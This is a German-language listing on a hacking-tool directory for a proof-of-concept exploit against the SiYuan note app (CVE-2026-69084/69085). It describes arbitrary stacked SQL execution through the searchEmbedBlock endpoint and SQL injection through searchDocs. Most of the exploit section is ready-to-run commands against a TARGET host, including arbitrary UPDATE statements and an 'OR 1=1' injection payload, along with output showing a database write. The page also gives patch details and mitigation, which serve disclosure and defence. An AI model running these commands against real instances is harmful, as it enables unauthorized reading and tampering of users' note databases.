Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-69084-PoC — CVE-2026-69084/69085 — SiYuan beliebige SQL-Ausführung über searchEmbedBlock + searchDocs SQLi (CVSS 9.9). Verifiziert auf v3.7.2, zurückgewiesen auf v3.7.3. | Kitploit
Tools/GitHubGitHub/boreas37/cve-2026-69084-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsDatenbanksicherheit
GitHubboreas37/cve-2026-69084-poc

CVE-2026-69084-PoC

CVE-2026-69084/69085 — SiYuan beliebige SQL-Ausführung über searchEmbedBlock + searchDocs SQLi (CVSS 9.9). Verifiziert auf v3.7.2, zurückgewiesen auf v3.7.3.

Repository anzeigen
1vor 10 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-69084 / CVE-2026-69085 — SiYuan: Beliebige SQL-Ausführung & SQLi

CVE-2026-69084: Beliebige SQL-Ausführung über /api/search/searchEmbedBlock CVE-2026-69085: SQL-Injection über /api/filetree/searchDocs CVSS 9.9 (Kritisch) jeweils · CWE-89 · SiYuan <= v3.7.2 (behoben in v3.7.3) Veröffentlicht am 2026-08-03 · zum Zeitpunkt der Veröffentlichung kein öffentlicher PoC

TL;DR

SiYuan (Open-Source-Notiz-App, github.com/siyuan-note/siyuan) stellt zwei API-Endpunkte bereit, die angreiferkontrolliertes SQL an seine SQLite-Datenbank weiterreichen:

CVE-2026-69084 — /api/search/searchEmbedBlock: Der Parameter stmt wird unverändert an den Haupt-Lese-/Schreib-Handle siyuan.db übergeben, ohne Einschränkung auf eine einzelne Anweisung oder auf Nur-Lesen. Der SQLite-Treiber führt gestapelte (durch Semikolon getrennte) Anweisungen aus, sodass ein Angreifer in der Datenbank beliebig CREATE / INSERT / UPDATE / DELETE / DROP ausführen kann. Nur durch CheckAuth abgesichert — erreichbar mit einem Publish-RoleReader-Token oder anonym, wenn im Publish-Modus Publish.Auth.Enable=false gesetzt ist.

CVE-2026-69085 — /api/filetree/searchDocs: Der Parameter keyword wird ohne Escaping oder Parameterbindung direkt in SQL konkateniert.

Beide wurden in v3.7.3 über sql.CheckSingleStatement() + sql.CheckReadonlyStatementInBox() behoben.

Exploit

root@kitploit:~
# 1. Non-destructive probe (sqlite_version)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --check

# 2. DB-write proof: CREATE TABLE + INSERT
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --proof

# 3. Run arbitrary SQL (stacked statements supported)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "SELECT * FROM blocks LIMIT 5"
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "UPDATE blocks SET hpath='PWNED' WHERE id=(SELECT id FROM blocks LIMIT 1)"

# 4. searchDocs SQLi (69085)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --searchdocs "x' OR 1=1 --"

Wenn die Instanz mit aktiviertem Publish-Modus und deaktivierter Authentifizierung läuft (Publish.Auth.Enable=false), ist überhaupt kein --auth erforderlich.

Verifizierung (echtes SiYuan v3.7.2 in Docker)

root@kitploit:~
$ python3 CVE-2026-69084.py http://127.0.0.1:6806 --auth test123 --proof
[*] SQL: CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)
[+] SQL kabul edildi (blocks: 0)
[*] SQL: INSERT INTO pwn_69084 VALUES (31337)
[+] SQL kabul edildi (blocks: 0)
[+] DB-WRITE KANITI TAMAM — siyuan.db'de pwn_69084 tablosu + 31337 satırı

# On the host:
$ sqlite3 siyuan.db "SELECT * FROM pwn_69084;"
31337

Gepatchtes v3.7.3 lehnt dieselben Anfragen ab:

  • SELECT 1; CREATE TABLE x → "SQL statement is not single"
  • UPDATE blocks ... → "SQL statement is not a read-only query"
  • ein einzelnes SELECT funktioniert weiterhin (legitime Funktionalität bleibt erhalten)

PoC-Interna

Das Python-PoC führt einen Session-Login (/api/system/loginAuth) durch, um das Auth-Cookie zu erhalten, und sendet dann POST-Anfragen an den verwundbaren Endpunkt. Getestet gegen b3log/siyuan:v3.7.2 (verwundbar) und b3log/siyuan:v3.7.3 (gepatcht).

Abhilfe

  • Aktualisiere SiYuan auf v3.7.3 oder neuer.
  • Wenn du den Publish-Modus von SiYuan öffentlich erreichbar machst, behalte Publish.Auth.Enable=true bei und verwende starke RoleReader-Tokens.

Referenzen

  • GHSA-p2x7-4c4p-8wh6 (69084)
  • GHSA-5w4j-hchp-r332 (69085)
  • NVD — CVE-2026-69084
  • NVD — CVE-2026-69085
  • VulnCheck-Sicherheitshinweis

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken.

Tool herunterladen